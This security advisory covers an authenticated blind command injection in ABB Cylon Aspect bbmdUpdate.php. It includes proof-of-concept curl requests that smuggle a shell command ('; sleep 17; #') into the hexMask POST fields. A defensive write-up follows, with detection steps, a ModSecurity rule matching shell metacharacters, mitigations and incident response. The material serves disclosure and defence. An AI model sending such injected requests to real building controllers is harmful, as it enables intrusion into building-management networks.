ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=SubmitABB Cylon Aspect 3.08.02 (bbmdUpdate.php) — Authenticated Blind Remote Code Execution
Overview
ABB Cylon ASPECT is a building management and energy control platform used in commercial and industrial buildings. Multiple ASPECT products (NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise and ASPECT-Studio) running firmware up to and including 3.08.02 were found to contain a server-side vulnerability in the bbmdUpdate.php component that can lead to authenticated blind command injection and an off-by-one array access issue that may cause undefined behavior or a denial-of-service (DoS).
Advisory and Identifiers
- Discovery: Gjoko “LiquidWorm” Krstic (@zeroscience)
- Advisory: ZSL-2025-5903 — https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
- CVE IDs: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
- Vendor: ABB Ltd. — product page: https://www.global.abb
- Tested platforms: various Linux distributions and PHP versions (see advisory for details)
Technical Summary
The vulnerable endpoint, bbmdUpdate.php, accepts configuration parameters via HTTP POST and persists them by writing files or invoking shell operations. Several POST parameters were passed to file write and/or shell-execution contexts without sufficient sanitization or proper escaping. Because user-supplied data could be interpreted by the shell, authenticated users were able to perform blind command injection (commands executed but output not returned to client). In addition, an off-by-one error in array indexing was identified that could trigger undefined behavior and potentially crash the application.
Root Causes
- Insufficient input validation and improper use of shell-invocation APIs (e.g., building system calls with unsanitized strings).
- Missing parameter sanitization before interpolation into filenames or shell arguments.
- Array indexing logic error introduced an off-by-one condition leading to out-of-bounds access.
Impact
- Authenticated remote attackers can execute arbitrary OS commands with the privileges of the web application (blind RCE).
- Potential service disruption from the off-by-one array access (DoS or instability).
- Compromise could lead to lateral movement inside building management networks and impact safety-critical building functions.
Detection and Hunting
Prioritize detection on management interfaces and look for anomalous request patterns, shell metacharacters, and unusual system activity from the web server account. Useful indicators and techniques include:
- Search web server access logs for requests to /bbmdUpdate.php and unusual POST payloads.
- Look for evidence of application-side commands or scheduled tasks created shortly after requests to bbmdUpdate.php.
- Monitor process spawns from the web server user and unexpected outbound network connections from management hosts.
# Safe check to see if the endpoint is present (non-exploit):
curl -s -I "http://BUILDING_CONTROLLER/bbmdUpdate.php" | head -n 5
Explanation: This example performs a harmless HTTP HEAD request to check for the existence of the bbmdUpdate.php endpoint and returns HTTP headers. It is safe because it does not submit configuration parameters or attempt to exploit the vulnerability.
Defensive Detection Signature Examples
Defensive signatures should look for suspicious characters (e.g., shell metacharacters) in POST parameters known to be used by bbmdUpdate.php combined with the presence of the PHPSESSID cookie or other authentication tokens. Example regular expressions are defensive and can be deployed in IDS/IPS or WAFs:
# Example ModSecurity rule (defensive) — block suspicious metacharacters in specific POST fields
SecRule REQUEST_URI "@endsWith /bbmdUpdate.php" "id:100001,phase:2,deny,log,msg:'Potential bbmdUpdate.php injection - suspicious characters in parameters'"
SecRule ARGS_NAMES "^(ip|port|hexMask|NATip|NATport|NAThexMask)$" "chain"
SecRule ARGS "^.*[;&|`$()].*$" "t:none"
Explanation: The first rule triggers on requests to bbmdUpdate.php. The chained condition checks specific parameter names and then looks for common shell metacharacters inside their values. This is a defensive pattern to block or log suspicious attempts without issuing exploitation guidance.
Mitigation and Remediation
| Affected Component | Recommended Action |
|---|---|
| Firmware <= 3.08.02 | Upgrade firmware to the vendor-supplied fixed version. If an official patch exists, apply immediately. |
| Network Accessibility | Restrict administrative interfaces to management VLANs and trusted IP ranges. Block access from the public Internet. |
| Authentication | Enforce strong authentication for BMS interfaces, rotate default credentials, and implement multi-factor authentication where supported. |
| Web Application | Deploy a WAF with tailored rules to block shell metacharacters in configuration parameters and monitor POST requests to administrativa endpoints. |
| Monitoring | Enable process and network monitoring on controllers; alert on unusual outbound connections or suspicious child processes of web server user. |
Short-Term Compensating Controls
- Isolate vulnerable controllers from general-purpose networks using VLANs and strict firewall rules.
- Apply host-based monitoring and restrict execution permissions for web-server processes.
- Temporarily disable the management web interface if remote access is not required, or place it behind a VPN requiring strong authentication.
Secure Development Recommendations (Vendor Guidance)
- Do not pass unsanitized user input into shell-invoking APIs. Prefer native configuration APIs or use safe libraries that avoid shell interpretation.
- Validate and canonicalize input strictly (whitelisting acceptable IP, port, and mask formats).
- Use prepared file-write functions and avoid concatenating untrusted input into command lines.
- Add bounds-checking and unit tests to prevent off-by-one errors in array handling.
Incident Response Considerations
- If compromise is suspected, isolate the device from the network and collect volatile artifacts (web server logs, process lists, crontab/task schedules).
- Preserve a forensic image prior to remediation when possible, and follow legal and regulatory requirements for critical infrastructure devices.
- After remediation, perform an integrity review and verify configuration did not contain backdoors or additional persistence mechanisms.
References
- Zeroscience advisory: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
- CVE: https://www.cve.org/CVERecord?id=CVE-2024-48839
- Vendor resources: check ABB support and firmware download portals for official bulletins and patches.